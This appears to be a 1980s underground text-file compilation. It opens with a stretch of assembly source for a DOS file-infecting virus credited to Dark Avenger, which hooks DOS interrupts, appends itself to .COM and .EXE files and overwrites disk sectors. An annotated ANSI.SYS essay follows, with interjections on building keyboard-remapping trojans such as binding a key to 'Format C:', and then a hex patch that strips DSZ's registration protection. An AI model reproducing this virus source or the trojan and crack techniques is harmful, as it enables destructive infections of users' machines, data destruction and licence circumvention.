	xor	ax,ax
	push	ax
	mov	ds,ax
	les	ax,ds:[13h*4]
	mov	word ptr cs:[si+fdisk],ax
	mov	word ptr cs:[si+fdisk+2],es
	mov	word ptr cs:[si+disk],ax
	mov	word ptr cs:[si+disk+2],es
	mov	ax,ds:[40h*4+2] 	; INT 40h     INT 13h
	cmp	ax,0f000h		;      
	jne	nofdisk
	mov	word ptr cs:[si+disk+2],ax
	mov	ax,ds:[40h*4]
	mov	word ptr cs:[si+disk],ax
	mov	dl,80h
	mov	ax,ds:[41h*4+2] 	;INT 41h    ,
	cmp	ax,0f000h		;   INT 13h 
	je	isfdisk
	cmp	ah,0c8h
	jc	nofdisk
	cmp	ah,0f4h
	jnc	nofdisk
	test	al,7fh
	jnz	nofdisk
	mov	ds,ax
	cmp	ds:[0],0aa55h
	jne	nofdisk
	mov	dl,ds:[2]
isfdisk:
	mov	ds,ax
	xor	dh,dh
	mov	cl,9
	shl	dx,cl
	mov	cx,dx
	xor	si,si
findvect:
	lodsw				;  :
	cmp	ax,0fa80h		;	CMP	DL,80h
	jne	altchk			;	JNC	
	lodsw
	cmp	ax,7380h
	je	intchk
	jne	nxt0
altchk:
	cmp	ax,0c2f6h		; :
	jne	nxt			;	TEST	DL,80h
	lodsw				;	JNZ	
	cmp	ax,7580h
	jne	nxt0
intchk:
	inc	si			;  :
	lodsw				;	INT	40h
	cmp	ax,40cdh
	je	found
	sub	si,3
nxt0:
	dec	si
	dec	si
nxt:
	dec	si
	loop	findvect
	jmp	short nofdisk
found:
	sub	si,7
	mov	word ptr cs:[di+fdisk],si
	mov	word ptr cs:[di+fdisk+2],ds
nofdisk:
	mov	si,di
	pop	ds

;     

	les	ax,ds:[21h*4]
	mov	word ptr cs:[si+save_int_21],ax
	mov	word ptr cs:[si+save_int_21+2],es
	push	cs
	pop	ds
	cmp	ax,offset int_21
	jne	bad_func
	xor	di,di
	mov	cx,offset my_size
scan_func:
	lodsb
	scasb
	jne	bad_func
	loop	scan_func
	pop	es
	jmp	go_program

;        
; (      )

bad_func:
	pop	es
	mov	ah,49h
	int	21h
	mov	bx,0ffffh
	mov	ah,48h
	int	21h
	sub	bx,(top_bz+my_bz+1ch-1)/16+2
	jc	go_program
	mov	cx,es
	stc
	adc	cx,bx
	mov	ah,4ah
	int	21h
	mov	bx,(offset top_bz+offset my_bz+1ch-1)/16+1
	stc
	sbb	es:[2],bx
	push	es
	mov	es,cx
	mov	ah,4ah
	int	21h
	mov	ax,es
	dec	ax
	mov	ds,ax
	mov	word ptr ds:[1],8
	call	mul_16
	mov	bx,ax
	mov	cx,dx
	pop	ds
	mov	ax,ds
	call	mul_16
	add	ax,ds:[6]
	adc	dx,0
	sub	ax,bx
	sbb	dx,cx
	jc	mem_ok
	sub	ds:[6],ax		;    
mem_ok:
	pop	si
	push	si
	push	ds
	push	cs
	xor	di,di
	mov	ds,di
	lds	ax,ds:[27h*4]
	mov	word ptr cs:[si+save_int_27],ax
	mov	word ptr cs:[si+save_int_27+2],ds
	pop	ds
	mov	cx,offset aux_size
	rep	movsb
	xor	ax,ax
	mov	ds,ax
	mov	ds:[21h*4],offset int_21;  INT 21h  INT 27h
	mov	ds:[21h*4+2],es
	mov	ds:[27h*4],offset int_27
	mov	ds:[27h*4+2],es
	mov	word ptr es:[filehndl],ax
	pop	es
go_program:
	pop	si

;      

	xor	ax,ax
	mov	ds,ax
	mov	ax,ds:[13h*4]
	mov	word ptr cs:[si+save_int_13],ax
	mov	ax,ds:[13h*4+2]
	mov	word ptr cs:[si+save_int_13+2],ax
	mov	ds:[13h*4],offset int_13
	add	ds:[13h*4],si
	mov	ds:[13h*4+2],cs
	pop	ds
	push	ds
	push	si
	mov	bx,si
	lds	ax,ds:[2ah]
	xor	si,si
	mov	dx,si
scan_envir:				;   
	lodsw				;( DOS 2.x     )
	dec	si
	test	ax,ax
	jnz	scan_envir
	add	si,3
	lodsb

;     .      path- 
;  ,       .   
;    +   DOS     ,  
;     , -   .

	sub	al,'A'
	mov	cx,1
	push	cs
	pop	ds
	add	bx,offset int_27
	push	ax
	push	bx
	push	cx
	int	25h
	pop	ax
	pop	cx
	pop	bx
	inc	byte ptr [bx+0ah]
	and	byte ptr [bx+0ah],0fh	; 15     
	jnz	store_sec		;   
	mov	al,[bx+10h]
	xor	ah,ah
	mul	word ptr [bx+16h]
	add	ax,[bx+0eh]
	push	ax
	mov	ax,[bx+11h]
	mov	dx,32
	mul	dx
	div	word ptr [bx+0bh]
	pop	dx
	add	dx,ax
	mov	ax,[bx+8]
	add	ax,40h
	cmp	ax,[bx+13h]
	jc	store_new
	inc	ax
	and	ax,3fh
	add	ax,dx
	cmp	ax,[bx+13h]
	jnc	small_disk
store_new:
	mov	[bx+8],ax
store_sec:
	pop	ax
	xor	dx,dx
	push	ax
	push	bx
	push	cx
	int	26h

;       - ,     
;  (      )

	pop	ax
	pop	cx
	pop	bx
	pop	ax
	cmp	byte ptr [bx+0ah],0
	jne	not_now
	mov	dx,[bx+8]
	pop	bx
	push	bx
	int	26h
small_disk:
	pop	ax
not_now:
	pop	si
	xor	ax,ax
	mov	ds,ax
	mov	ax,word ptr cs:[si+save_int_13]
	mov	ds:[13h*4],ax
	mov	ax,word ptr cs:[si+save_int_13+2]
	mov	ds:[13h*4+2],ax
	pop	ds
	pop	ax
	cmp	word ptr cs:[si+my_save],5a4dh
	jne	go_exit_com
	jmp	exit_exe
go_exit_com:
	jmp	exit_com
int_24:
	mov	al,3			;   
	iret

;   INT 27h (  )

int_27:
	pushf
	call	alloc
	popf
	jmp	dword ptr cs:[save_int_27]

;  DOS- Set & Get Vector         
;  (         
;    "" )

set_int_27:
	mov	word ptr cs:[save_int_27],dx
	mov	word ptr cs:[save_int_27+2],ds
	popf
	iret
set_int_21:
	mov	word ptr cs:[save_int_21],dx
	mov	word ptr cs:[save_int_21+2],ds
	popf
	iret
get_int_27:
	les	bx,dword ptr cs:[save_int_27]
	popf
	iret
get_int_21:
	les	bx,dword ptr cs:[save_int_21]
	popf
	iret

exec:
	call	do_file
	call	alloc
	popf
	jmp	dword ptr cs:[save_int_21]

	db	'Diana P.',0

;   INT 21h.     
;  , ,       .
;    0  26h   .

int_21:
	push	bp
	mov	bp,sp
	push	[bp+6]
	popf
	pop	bp
	pushf
	call	ontop
	cmp	ax,2521h
	je	set_int_21
	cmp	ax,2527h
	je	set_int_27
	cmp	ax,3521h
	je	get_int_21
	cmp	ax,3527h
	je	get_int_27
	cld
	cmp	ax,4b00h
	je	exec
	cmp	ah,3ch
	je	create
	cmp	ah,3eh
	je	close
	cmp	ah,5bh
	jne	not_create
create:
	cmp	word ptr cs:[filehndl],0;    0   
	jne	dont_touch
	call	see_name
	jnz	dont_touch
	call	alloc
	popf
	call	function
	jc	int_exit
	pushf
	push	es
	push	cs
	pop	es
	push	si
	push	di
	push	cx
	push	ax
	mov	di,offset filehndl
	stosw
	mov	si,dx
	mov	cx,65
move_name:
	lodsb
	stosb
	test	al,al
	jz	all_ok
	loop	move_name
	mov	word ptr es:[filehndl],cx
all_ok:
	pop	ax
	pop	cx
	pop	di
	pop	si
	pop	es
go_exit:
	popf
	jnc	int_exit		;JMP
close:
	cmp	bx,word ptr cs:[filehndl]
	jne	dont_touch
	test	bx,bx
	jz	dont_touch
	call	alloc
	popf
	call	function
	jc	int_exit
	pushf
	push	ds
	push	cs
	pop	ds
	push	dx
	mov	dx,offset filehndl+2
	call	do_file
	mov	word ptr cs:[filehndl],0
	pop	dx
	pop	ds
	jmp	go_exit
not_create:
	cmp	ah,3dh
	je	touch
	cmp	ah,43h
	je	touch
	cmp	ah,56h			;   
	jne	dont_touch		;   
touch:
	call	see_name
	jnz	dont_touch
	call	do_file
dont_touch:
	call	alloc
	popf
	call	function
int_exit:
	pushf
	push	ds
	call	get_chain
	mov	byte ptr ds:[0],'Z'
	pop	ds
	popf
dummy	proc	far			;???
	ret	2
dummy	endp

;     .COM  .EXE.        .

see_name:
	push	ax
	push	si
	mov	si,dx
scan_name:
	lodsb
	test	al,al
	jz	bad_name
	cmp	al,'.'
	jnz	scan_name
	call	get_byte
	mov	ah,al
	call	get_byte
	cmp	ax,'co'
	jz	pos_com
	cmp	ax,'ex'
	jnz	good_name
	call	get_byte
	cmp	al,'e'
	jmp	short good_name
pos_com:
	call	get_byte
	cmp	al,'m'
	jmp	short good_name
bad_name:
	inc	al
good_name:
	pop	si
	pop	ax
	ret

;   lowercase (   ).

get_byte:
	lodsb
	cmp	al,'C'
	jc	byte_got
	cmp	al,'Y'
	jnc	byte_got
	add	al,20h
byte_got:
	ret

;   INT 21h (    ).

function:
	pushf
	call	dword ptr cs:[save_int_21]
	ret

;     .

do_file:
	push	ds			;   
	push	es
	push	si
	push	di
	push	ax
	push	bx
	push	cx
	push	dx
	mov	si,ds
	xor	ax,ax
	mov	ds,ax
	les	ax,ds:[24h*4]		; INT 13h  INT 24h  
	push	es			;     
	push	ax
	mov	ds:[24h*4],offset int_24
	mov	ds:[24h*4+2],cs
	les	ax,ds:[13h*4]
	mov	word ptr cs:[save_int_13],ax
	mov	word ptr cs:[save_int_13+2],es
	mov	ds:[13h*4],offset int_13
	mov	ds:[13h*4+2],cs
	push	es
	push	ax
	mov	ds,si
	xor	cx,cx			;   Read-only 
	mov	ax,4300h
	call	function
	mov	bx,cx
	and	cl,0feh
	cmp	cl,bl
	je	dont_change
	mov	ax,4301h
	call	function
	stc
dont_change:
	pushf
	push	ds
	push	dx
	push	bx
	mov	ax,3d02h		;     
	call	function		; 
	jc	cant_open
	mov	bx,ax
	call	disease
	mov	ah,3eh			;
	call	function
cant_open:
	pop	cx
	pop	dx
	pop	ds
	popf
	jnc	no_update
	mov	ax,4301h		;    ,
	call	function		;    (  )
no_update:
	xor	ax,ax			;  INT 13h  INT 24h
	mov	ds,ax
	pop	ds:[13h*4]
	pop	ds:[13h*4+2]
	pop	ds:[24h*4]
	pop	ds:[24h*4+2]
	pop	dx			;  
	pop	cx
	pop	bx
	pop	ax
	pop	di
	pop	si
	pop	es
	pop	ds
	ret

;     .

disease:
	push	cs
	pop	ds
	push	cs
	pop	es
	mov	dx,offset top_save	;    
	mov	cx,18h
	mov	ah,3fh
	int	21h
	xor	cx,cx
	xor	dx,dx
	mov	ax,4202h		;    
	int	21h
	mov	word ptr [top_save+1ah],dx
	cmp	ax,offset my_size	;    top_file
	sbb	dx,0
	jc	stop_fuck_2		;    
	mov	word ptr [top_save+18h],ax
	cmp	word ptr [top_save],5a4dh
	jne	com_file
	mov	ax,word ptr [top_save+8]
	add	ax,word ptr [top_save+16h]
	call	mul_16
	add	ax,word ptr [top_save+14h]
	adc	dx,0
	mov	cx,dx
	mov	dx,ax
	jmp	short see_sick
com_file:
	cmp	byte ptr [top_save],0e9h
	jne	see_fuck
	mov	dx,word ptr [top_save+1]
	add	dx,103h
	jc	see_fuck
	dec	dh
	xor	cx,cx

;         

see_sick:
	sub	dx,startup-copyright
	sbb	cx,0
	mov	ax,4200h
	int	21h
	add	ax,offset top_file
	adc	dx,0
	cmp	ax,word ptr [top_save+18h]
	jne	see_fuck
	cmp	dx,word ptr [top_save+1ah]
	jne	see_fuck
	mov	dx,offset top_save+1ch
	mov	si,dx
	mov	cx,offset my_size
	mov	ah,3fh
	int	21h
	jc	see_fuck
	cmp	cx,ax
	jne	see_fuck
	xor	di,di
next_byte:
	lodsb
	scasb
	jne	see_fuck
	loop	next_byte
stop_fuck_2:
	ret
see_fuck:
	xor	cx,cx			;    
	xor	dx,dx
	mov	ax,4202h
	int	21h
	cmp	word ptr [top_save],5a4dh
	je	fuck_exe
	add	ax,offset aux_size+200h ;   .COM   
	adc	dx,0
	je	fuck_it
	ret

;       .EXE .     .

fuck_exe:
	mov	dx,word ptr [top_save+18h]
	neg	dl
	and	dx,0fh
	xor	cx,cx
	mov	ax,4201h
	int	21h
	mov	word ptr [top_save+18h],ax
	mov	word ptr [top_save+1ah],dx
fuck_it:
	mov	ax,5700h		;    
	int	21h
	pushf
	push	cx
	push	dx
	cmp	word ptr [top_save],5a4dh
	je	exe_file		; ,  
	mov	ax,100h
	jmp	short set_adr
exe_file:
	mov	ax,word ptr [top_save+14h]
	mov	dx,word ptr [top_save+16h]
set_adr:
	mov	di,offset call_adr
	stosw
	mov	ax,dx
	stosw
	mov	ax,word ptr [top_save+10h]
	stosw
	mov	ax,word ptr [top_save+0eh]
	stosw
	mov	si,offset top_save	;     
	movsb				;   
	movsw				;   .EXE 
	xor	dx,dx
	mov	cx,offset top_file
	mov	ah,40h
	int	21h			;  
	jc	go_no_fuck		;(  )
	xor	cx,ax
	jnz	go_no_fuck
	mov	dx,cx
	mov	ax,4200h
	int	21h
	cmp	word ptr [top_save],5a4dh
	je	do_exe
	mov	byte ptr [top_save],0e9h
	mov	ax,word ptr [top_save+18h]
	add	ax,startup-copyright-3
	mov	word ptr [top_save+1],ax
	mov	cx,3
	jmp	short write_header
go_no_fuck:
	jmp	short no_fuck

;   header-  .EXE 

do_exe:
	call	mul_hdr
	not	ax
	not	dx
	inc	ax
	jne	calc_offs
	inc	dx
calc_offs:
	add	ax,word ptr [top_save+18h]
	adc	dx,word ptr [top_save+1ah]
	mov	cx,10h
	div	cx
	mov	word ptr [top_save+14h],startup-copyright
	mov	word ptr [top_save+16h],ax
	add	ax,(offset top_file-offset copyright-1)/16+1
	mov	word ptr [top_save+0eh],ax
	mov	word ptr [top_save+10h],100h
	add	word ptr [top_save+18h],offset top_file
	adc	word ptr [top_save+1ah],0
	mov	ax,word ptr [top_save+18h]
	and	ax,1ffh
	mov	word ptr [top_save+2],ax
	pushf
	mov	ax,word ptr [top_save+19h]
	shr	byte ptr [top_save+1bh],1
	rcr	ax,1
	popf
	jz	update_len
	inc	ax
update_len:
	mov	word ptr [top_save+4],ax
	mov	cx,18h
write_header:
	mov	dx,offset top_save
	mov	ah,40h
	int	21h			;    
no_fuck:
	pop	dx
	pop	cx
	popf
	jc	stop_fuck
	mov	ax,5701h		;   
	int	21h
stop_fuck:
	ret

;        INT 21h  INT 27h  
;        ,     
; .             
;   .

alloc:
	push	ds
	call	get_chain
	mov	byte ptr ds:[0],'M'
	pop	ds

;         ,
;  INT 21h (     ).

ontop:
	push	ds
	push	ax
	push	bx
	push	dx
	xor	bx,bx
	mov	ds,bx
	lds	dx,ds:[21h*4]
	cmp	dx,offset int_21
	jne	search_segment
	mov	ax,ds
	mov	bx,cs
	cmp	ax,bx
	je	test_complete

;      INT 21h,     
;        .   INT 27h    .

	xor	bx,bx
search_segment:
	mov	ax,[bx]
	cmp	ax,offset int_21
	jne	search_next
	mov	ax,cs
	cmp	ax,[bx+2]
	je	got_him
search_next:
	inc	bx
	jne	search_segment
	je	return_control
got_him:
	mov	ax,word ptr cs:[save_int_21]
	mov	[bx],ax
	mov	ax,word ptr cs:[save_int_21+2]
	mov	[bx+2],ax
	mov	word ptr cs:[save_int_21],dx
	mov	word ptr cs:[save_int_21+2],ds
	xor	bx,bx

;        ,       

return_control:
	mov	ds,bx
	mov	ds:[21h*4],offset int_21
	mov	ds:[21h*4+2],cs
test_complete:
	pop	dx
	pop	bx
	pop	ax
	pop	ds
	ret

;      MCB

get_chain:
	push	ax
	push	bx
	mov	ah,62h
	call	function
	mov	ax,cs
	dec	ax
	dec	bx
next_blk:
	mov	ds,bx
	stc
	adc	bx,ds:[3]
	cmp	bx,ax
	jc	next_blk
	pop	bx
	pop	ax
	ret

;   16

mul_hdr:
	mov	ax,word ptr [top_save+8]
mul_16:
	mov	dx,10h
	mul	dx
	ret

	db	'This program was written in the city of Sofia '
	db	'(C) 1988-89 Dark Avenger',0

;   INT 13h.
;     BIOS,     .

int_13:
	cmp	ah,3
	jnz	subfn_ok
	cmp	dl,80h
	jnc	hdisk
	db	0eah			;JMP XXXX:YYYY
my_size:				;---     
disk:
	dd	0
hdisk:
	db	0eah			;JMP XXXX:YYYY
fdisk:
	dd	0
subfn_ok:
	db	0eah			;JMP XXXX:YYYY
save_int_13:
	dd	0
call_adr:
	dd	100h

stack_pointer:
	dd	0			;   SS:SP
my_save:
	int	20h			;   
	nop				;3   
top_file:				;---     
filehndl    equ $
filename    equ filehndl+2		;      
save_int_27 equ filename+65		;   INT 27h
save_int_21 equ save_int_27+4		;   INT 21h
aux_size    equ save_int_21+4		;---     
top_save    equ save_int_21+4		;  , :
					; -  24    
					; -    (4 )
					; -    
					;   (  my_size)
top_bz	    equ top_save-copyright
my_bz	    equ my_size-copyright
code	ends
	end


Phile 7:
                            USING THE ANSI DRIVER
                              [TO MAKE TROJENS]
 
                                      by
 
                                C. Scot Giles
                               875 Lake Street
                          Oak Park, Illinois   60301
 
                        [Turned Pirate By Toilet Scum]
[All text in [] has been added by Toilet Scum, leader of AAD (Alliance Against]
[DUNE), WITHOUT the consent of the author!]
 
This essay is an attempt to explain how I use the ANSI.SYS driver to configure
the function keys on my computer, and to control the screen.  I have used
these techniques on my PC and AT for years, and find them to be convenient and
effective.  ANSI is not widely used by microcomputer fans because the
documentation supplied by IBM on how to send control codes to the ANSI driver
is among the most cryptic ever produced by IBM.  I learned them by reading
computer magazines, and slowly figured out how it could be done.  I am not a
professional computer programmer (indeed I am a clergyman), so some of my
                                                ^^^^^^^^^ [And i'm a Pirate]
technical observations might be in error.  But everything here works, and I
have retested it before finishing this essay.
 
This essay covers only IBM Personal Computers (PC, XT or AT) running DOS 2.n
or greater.  I have no experience with compatibles, so you are on your own if
you try to use these techniques on one.
 
                           LOADING THE ANSI DRIVER
 
In order to use any of the techniques in this essay, you must first have
loaded the ANSI.SYS driver into your computer's memory using your CONFIG.SYS
file.  You do this my adding the line, DEVICE=ANSI.SYS somewhere in the
CONFIG.SYS file and rebooting your computer.
 
[My intellegance was insulted here]
 
                       KEYBOARD REASSIGNMENT WITH ANSI
 
 
Before we get to specific ways to send control codes to the (now loaded) ANSI
driver, you must first know what those codes mean.  For the function keys the
codes are listed on the chart below which first appeared in SOFTALK magazine.
Each function key is assigned an "extended function code" which DOS will use
to recognize that a function key has been pressed and in what shifted mode, if
any.  Each number is expressed as a 0 followed by a semi-colon, then the
number from the chart below.
 
                KEY     NORMAL  SHIFT   CONTROL  ALT
                F1      59      84      94      104
                F2      60      85      95      105
                F3      61      86      96      106
                F4      62      87      97      107
                F5      63      88      98      108
                F6      64      89      99      109
                F7      65      90      100     110
                F8      66      91      101     111
                F9      67      92      102     112
                F10     68      93      103     113
 
Accordingly, the way to designate the F5 key would be 0;63 while the F10 key
would be designated by 0;68 or 0;113 if shifted with the ALT key.
 
 
 
 
 
 
 

                       Using the ANSI driver, Page -2-
 
 
 
If you examine the DOS Technical Reference Manual (not the Technical Manual
for PC hardware), you will find a section on SCREEN/KEYS.  This section was
contained in the DOS 2.0 documentation, but IBM removed it in later editions.
Here is a summary of its contents relative to keyboard redefinition.
 
To change one key to have the meaning of another, enter:
 
                                 ESC [#;#p
 
where the first # is the ASCII value of the key being changed and the second #
is the ASCII value of the new definition.  For example, "A" has the ASCII
value of 65 and "Q" has the value of 81.  So:
 
                                 ESC [65;81p
 
will result in "A" being redefined as "Q."  It is also possible to redefine a
key to have the meaning of a string of characters.  This is done by enclosing
the string in quotes.  So:
 
                                 ESC [65;"Hi there"p
 
would change the "A" key to have the meaning of "Hi there."  If the first
value for the first # is a 0 however, DOS knows that what is being changed is
not an ASCII value but the meaning of an extended function code.  So if you
were to enter:
 
                                 ESC [0;68;"Hi there"p
 
DOS would know to change the meaning of the function key (in this case F10) to
the sting enclosed in quotes.  This is the key to redefining your function
keys to perform much used commands: like DIR, CHKDSK, COPY *.* B: etc. or to
load programs from disk.
 
There is a final trick here.  If you end the escape command sequence with the
characters ";13p" instead of just "p" the command will self-execute, just as
if you pressed the [enter] key.
 
The IBM documentation tells the user to preface each command by an ESC
command, and I have represented this in the above paragraphs by writing the
characters "ESC." at the start of each control code sequence mentioned.  Most
users assume that this means to press the ESC key on the keyboard when
entering the commands.  Not so.  To get the Escape Sequence to the ANSI driver
you must enter it using a prompt command or write a .COM file.  For example to
configure the F1 key (extended function code 59) to have the meaning in DOS of
"autoexec" with an [enter] command at the end of it you cannot type:
 
                                ESC [0;59;"autoexec";13p
                                           ^^^^^^^^ [Put something useful]
                                           [here like "Format C:"  Then]
                                           [redifine his N to Y, Get the]
                                           [picture?]
                                                                         
as the ESC will not be recognized by DOS as an escape sequence.  What DOS will
recognize as an escape sequence is the characters "$e" although this surely
looks strange at first.  Users familiar with the PROMPT command will notice
that the "$" character is what the PROMPT command uses as an escape sequence,
and that is precisely how we will get the redefinition to be recognized by
DOS.  If you enter the following command:
 
 
 
 
                                                    

                       Using the ANSI driver, Page -3-
 
 
 
                                PROMPT $e[0;59;"autoexec";13p
 
you will see that it works perfectly.  You now have the secret to redefining
the function keys in DOS.  Simply write and run a batch file with a list of
PROMPT commands and you will have done it.  One precaution, ECHO must be ON,
otherwise DOS will suppress the PROMPT command and the escape sequences will
not get through.
 
As an example, let's create a batch file called KEYON.BAT that will set F1 as
EDITOR [enter], F2 as PC-FILE [enter], F3 as PC-CALC [enter], F4 as PC-GRAPH
[enter], F5 as PC-TALK [enter], F6 as PC-WRITE [enter], F7 as BASICA [enter],
F8 as DIR without the [enter], F9 to run a batch file called MENUOFF.BAT
[enter] and F10 to run a batch file called MENUON.BAT [enter].  It would be as
follows:
 
                echo on
                PROMPT $e[0;59;"EDITOR";13p
                PROMPT $e[0;60;"PC-FILE";13p
                PROMPT $e[0;61;"PC-CALC";13p
                PROMPT $e[0;62;"PC-GRAPH";13p
                PROMPT $e[0;63;"PC-TALK";13p
                PROMPT $e[0;64;"PC-WRITE";13p
                PROMPT $e[0;65;"BASICA";13p
                PROMPT $e[0;66;"DIR"p
                PROMPT $e[0;67;"MENUOFF";13p
                PROMPT $e[0;68;"MENUON";13p
                prompt
                cls
 
You would also want to create another file called KEYOFF.BAT which resets the
function key definitions to DOS normal.  The format would be:
 
                echo on
                PROMPT $e[0;59;0;59p
                PROMPT $e[0;60;0;60p
                PROMPT $e[0;61;0;61p
                PROMPT $e[0;62;0;62p
                PROMPT $e[0;63;0;63p
                PROMPT $e[0;64;0;64p
                PROMPT $e[0;65;0;65p
                PROMPT $e[0;66;0;66p
                PROMPT $e[0;67;0;67p
                PROMPT $e[0;68;0;68p
                prompt
                cls
 
I should mention that the purpose of the final blank PROMPT command in each of
these batch files is to reset the DOS prompt to A> or whatever your default
prompt is.  It serves no redefinition purpose, but does keep the screen
looking clean.
 
[I have not found any good uses for this Prompt stuff, but if you find any]
[let me know]
 
 
 
 
 
 
 
 
 

                       Using the ANSI driver, Page -4-
 
 
                     USING DEBUG TO LOAD THE ANSI DRIVER
 
[Using this method you can Write COM files that that contain ANSI trojens,]
[VERY Useful]
 
While there is no reason why we could not continue to configure our function
keys by batch files consisting of lists of PROMPT commands, this is a clumsy
way to proceed.  It is easier to use the DEBUG utility supplied with DOS to
create a .COM file that will do the job for us quickly and directly, without
sending any input to screen.  To my knowledge this technique was first
published by Michael J. Grabel in the December 1984 edition of PC WORLD.
 
Place a formatted DOS disk containing the DEBUG utility in the default drive,
and follow the script below.  As you do so hexadecimal numbers will appear on
the left hand side of your screen.  These numbers will vary depending on the
configuration of your system.  For our purposes here I will represent the
numbers in the form xxxx:nnnn.  What you will see on your screen will be
different.
 
A>DEBUG [enter]
-A 100 [enter]
MOV AH,9 [enter]
MOV DX,109 [enter]
INT 21 [enter]
INT 20 [enter]
xxxx:nnnn DB 1B'[0;59;"EDITOR";13p' [enter]
xxxx:nnnn DB 1B'[0;60;"PC-FILE";13p' [enter]
xxxx:nnnn DB 1B'[0;61;"PC-CALC";13p' [enter]
xxxx:nnnn DB 1B'[0;62;"PC-GRAPH";13p' [enter]
xxxx:nnnn DB 1B'[0;63;"PC-TALK";13p' [enter]
xxxx:nnnn DB 1B'[0;64;"PC-WRITE";13p' [enter]
xxxx:nnnn DB 1B'[0;65;"BASICA";13p' [enter]
xxxx:nnnn DB 1B'[0;66;"DIR"p' [enter]
xxxx:nnnn DB 1B'[0;67;"MENUOFF";13p' [enter]
xxxx:nnnn DB 1B'[0;68;"MENUON";13p' [enter]
xxxx:nnnn DB 1B '$' [enter]
 
     As soon as you have entered the previous line, your computer will respond
     with a number in the form of xxxx:nnnn.  Copy down the portion of the
     number that is being represented here as "nnnn" as you will need it
     later.  Once you have copied the number down, press [enter]
 
xxxx:nnnn [enter]
-N KEYON.COM [enter]
-R BX [enter]
 
     When you have entered the command above, your computer will respond with
     the following line and a colon as a prompt.  At this prompt enter 0 and
     press [enter].
 
BX:0000
:0 [enter]
-R CX [enter]
 
     When you enter the R CX command above, the computer will respond with the
     following line and a colon as a prompt.  At this prompt enter the number,
     "nnnn" you copied down above and press [enter].
 
 
 
 
 
 
 
 
 

                       Using the ANSI driver, Page -5-
 
 
CX 0000
:nnnn [enter]
-W [enter]
 
     The computer will respond with the following.
 
WRITING nnnn bytes
-Q [enter]
 
As soon as you enter the Q command (for Quit) you will be back at the DOS
prompt, and there will be a new file on disk called KEYON.COM.  Simply type it
at the DOS prompt and your function keys will be configured.  It is a good
idea to use this same procedure to write another .COM file called KEYOFF.COM
which will restore the keys to their native DOS definitions.  The procedure
for this is the same as the above, except that the definition section should
be:
 
xxxx:nnnn DB 1B'[0;59;0;59p' [enter]
xxxx:nnnn DB 1B'[0;60;0;60p' [enter]
xxxx:nnnn DB 1B'[0;61;0;61p' [enter]
xxxx:nnnn DB 1B'[0;62;0;62p' [enter]
xxxx:nnnn DB 1B'[0;63;0;63p' [enter]
xxxx:nnnn DB 1B'[0;64;0;64p' [enter]
xxxx:nnnn DB 1B'[0;65;0;65p' [enter]
xxxx:nnnn DB 1B'[0;66;0;66p' [enter]
xxxx:nnnn DB 1B'[0;67;0;67p' [enter]
xxxx:nnnn DB 1B'[0;68;0;68p' [enter]
xxxx:nnnn DB 1B '$' [enter]
 
If you find that KEYON.COM doesn't work correctly, reboot the machine to clear
the definitions and try again.  The most common mistakes are typing errors (I
often enter a colon when I wanted a semi-colon).  Another source of difficulty
will arise if you have another file on disk to start with called KEYON.COM or
KEYOFF.COM.  DEBUG bypasses the normal file allocation of DOS and writes
directly to the disk.  If you have another file on disk with the same name,
DEBUG will overwrite it, but unless the other file was exactly the same size
as the new one or smaller, there may be a piece of the old file left over
attached to the end of the new one.  As a precaution, always erase old
versions of the .COM files, or better yet give each one a unique name and
rename it later using the DOS Rename command.
 
                            SOME ADDITIONAL TRICKS
 
[How to make your Trojens PRETTY??]
 
 
Here are some additional control codes for the ANSI driver, summarized from
the IBM material.
 
 
1. CURSOR POSITIONING
 
     To move the cursor to a specified position: ESC [#;#h where the first #
     is the desired line number and the second the desire column.
 
     To move the cursor up without changing columns: ESC [#a where # specifies
     the number of lines moved.
 
 
 
 
 
 
 
 

    

                    DSZ UNPROTECT FOR .EXE OR .COM VERSIONS

           The following DEBUG listing should aid most people familiar with
        any type of byte editor in removing the opening and closing screens
        and also enable the enhanced features of DSZ.COM or DSZ.EXE .
      *** IT WILL WORK WITH >ANY< VERSION, EXE OR COM THAT I HAVE TRIED.***
        DSZ is an excellent multiple protocol program which can be added to
        many terminal programs with very little effort and with excellent
        results. ZMODEM is the ultimate choice of this programmer for many
        reasons. Here are just a few of the Best Features.

                1.Crash recovery is great for those lousy phone lines
                  that have a tendency to lose connection 5 minutes into a
                  6 minute download. Just call back and it will pickup
                  right where it left off which means saving BIG $$$$$
                  compared to starting all over which makes Ma Bell BIG $$.

                2.Automated filename transfer which saves having to double
                  type in filenames. Just tell the BBS to send using Zmodem
                  protocol then call up DSZ and it will do the rest.

                3.Greatly increases efficiency in transfer rates and the
                  reliability of what is sent is what you receive. It uses
                  32-bit CRC error checking and is not unusual to get as
                  much as 239 CPS from a 2400 baud modem.

        The following are debug hex dumps of .COM and .EXE versions which
   as you will notice are very similar in the areas listed below.
        Directly following the copyright notice you will find 6 00's as
   soon as you locate these (which was the same address for every
   .COM version I checked and respectivly for every .EXE verison) all
   you need to do is change 4 of the 6 (the first 2 and last 2) as follows.


 --------< 64 1A{00 00 00 00 00 00}FF FF
|               ^|| || || || || ||^
|                91 14 00 00 CF 16
|
|
|
|
|                         DSZ.COM
|
| ????:0180  90 90 90 90 C3 43 6F 70-79 72 69 67 68 74 20 31   .....Copyright 1
| ????:0190  39 38 34 2C 20 31 39 38-38 20 4F 6D 65 6E 20 54   984, 1988 Omen T
| ????:01A0  65 63 68 6E 6F 6C 6F 67-79 20 49 6E 63 20 41 6C   echnology Inc Al
| ????:01B0  6C 20 52 69 67 68 74 73-20 52 65 73 65 72 76 65   l Rights Reserve
>>????:01C0  64 1A{00 00 00 00 00 00}FF FF 1E 06 55 56 57 F6   d...........UVW.
| ????:01D0  06 D9^A2 FF 74 1C B8 00^10 CD 16 A3 DC A2 3D 00   ....t.........=.
| ????:01E0  10 74 0F 3C E0 75 12 88-26 DB A2 8A C4 B4 02 EB   .t.<.u..&.......
|
|
|                         DSZ.EXE
|
| ????:0110  90 90 90 90 90 90 C3 43-6F 70 79 72 69 67 68 74   .......Copyright
| ????:0120  20 31 39 38 34 2C 20 31-39 38 38 20 4F 6D 65 6E    1984, 1988 Omen
| ????:0130  20 54 65 63 68 6E 6F 6C-6F 67 79 20 49 6E 63 20    Technology Inc
| ????:0140  41 6C 6C 20 52 69 67 68-74 73 20 52 65 73 65 72   All Rights Reser
>>????:0150  76 65 64 1A{00 00 00 00-00 00}FF FF 1E 06 55 56   ved...........UV
  ????:0160  57 F6 06 69^00 FF 74 1C-B8 00^10 CD 16 A3 6C 00   W..i..t.......l.
  ????:0170  3D 00 10 74 0F 3C E0 75-12 88 26 6B 00 8A C4 B4   =..t.<.u..&k....


           If this has been a help to you GREAT!!!! if not find a friend
